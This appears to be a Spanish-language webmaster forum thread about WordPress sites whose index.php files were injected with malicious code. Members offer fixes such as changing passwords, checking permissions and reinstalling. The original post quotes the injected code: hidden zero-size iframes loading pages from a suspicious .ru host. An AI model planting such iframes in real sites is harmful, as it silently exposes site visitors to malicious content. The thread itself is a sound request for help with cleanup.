Cómo proteger mi sitio WordPress de código malicioso

  • Autor Autor eldiosdelolimpo
  • Fecha de inicio Fecha de inicio

eldiosdelolimpo

1
Pi
Social Media
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Hola betas, quiero saber si a alguno de uds le paso lo mismo

resulta que desde hace un poco mas de una semana me encuentro con que algunos de mis sitios estan siendo inyectados con un codigo dentro de los archivos index.php que se encuentran en las carpetas Content y Themes

El código ejemplo es este:

<?php
// Silence is golden.
?><iframe name="SagUTeXYne" src="http://google-img.ru/stats/kx/index.php?out=1331462564" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe><iframe name="SagUTeXYne" src="http://google-img.ru/_/go.php?sid=1" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>


Algún dato sobre esto y como hacer que no vuelva a pasar?

De antemano, muchas gracias.

NOTA: Las plantillas y plugins los vengo utilizando hace tiempo y no he tenido problemas antes, y tengo instalada la ultima version de wp.
 
Nadie tiene acceso a tus sitios? o sera que en el hosting que estas tuebieron problemas...
 
tzogroup dijo:
Nadie tiene acceso a tus sitios? o sera que en el hosting que estas tuebieron problemas...
Hacer clic para expandir...

nadie tiene acceso a mis sitios, pero por lo que estoy viendo el problema es por el htacces que lo modifique para usar una funcion del plugin supercache.

Vere si dejandolo como antes no vuelve a ocurrir, ahora que veo, solo en esos sitios lo habia modificado el htacces.
 
OMG! Se las buscan todas... malditos... xD
 
Sigue el problema, alguien que me pueda dar una mano?
 
ahora te hablo por msn maestro, si es la solucion, desp comparto por aca
 
revisa los permisos de las carpetas, ese es el problema q tenes, cualquier cosa hablamos por msn y si no podes te lo soluciono
Saludo s
 
Tuve algo parecido... lo escribí aquí:

http://forobeta.com/charla-blogger/90692-mi-blog-redirige-a-otra-pagina.html#post887381

en mi caso, fue por un plugin que me jodía todas las cabeceras de los archivos, en el ftp me creo un directorio con miles de archivos html con títulos de keys llamativas (tipo britney.html etc) y 1&1 antes de que yo me diera cuenta me desactivó el ftp, me cambió la contraseña y me desactivó el sitio, además de que Google ya me había colocado como sitio potencialmente peligroso y Avast me detectaba también como virus... Al final después de reinstalar wordpress y borrar los miles de archivos del ftp todo volvió a su cauce...
 
estoy en la misma hace tiempo..si alguien se ofrece a ayudarme se lo agradeceria, hasta le podria pagar algo..
 
Utilizas plantillas gratuítas? Sino debe ser que tienes tu máquina infectada.
 
Obviamente es una intrusión.

hay que cambiar tus contraseñas (de todo), revisar tu ordenador y tambien revisar los archivos que hay en tu web, puede que por ahi haya una shell.

kj
 
A mi me atacaron la semana pasada, a consecuencia google me ha hecho down pero volveré jejeje ánimo amigo y dales duro! 😉
 
kj2 dijo:
Obviamente es una intrusión.

hay que cambiar tus contraseñas (de todo), revisar tu ordenador y tambien revisar los archivos que hay en tu web, puede que por ahi haya una shell.

kj
Hacer clic para expandir...

+1

Lo mejor en este caso es hacer limpieza del FTP desde otro ordenador y mientras tanto ir dejando bien limpio el ordenador con el que sueles trabajar. Tras eso, reinstalar Wordpress y en el Google Webmaster Tool subir el archivo que se llama algo así como google18921823 para verificar que esa web es tuya, una vez estés 100% seguro de que está todo arreglado para que Google no te penalice más si es que ya lo ha hecho.
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

Tutorial: 🎨 Trucos avanzados de personalización de WordPress con código CSS 💻✨
Respuestas
3
Visitas
208
djrijo
Prevención de código malicioso en Base de Datos de usuario
Respuestas
19
Visitas
580
spitfire
  • Pregunta Pregunta
Cómo eliminar código malicioso de Search Console
Respuestas
9
Visitas
415
BigSeoData
R
Plugin para detectar código malicioso en Wordpress
Respuestas
1
Visitas
238
rjga0103
R
Revisar THEME si tiene algún código malicioso
Respuestas
7
Visitas
513
migueldesafio
M
Menú
Acceder
Registro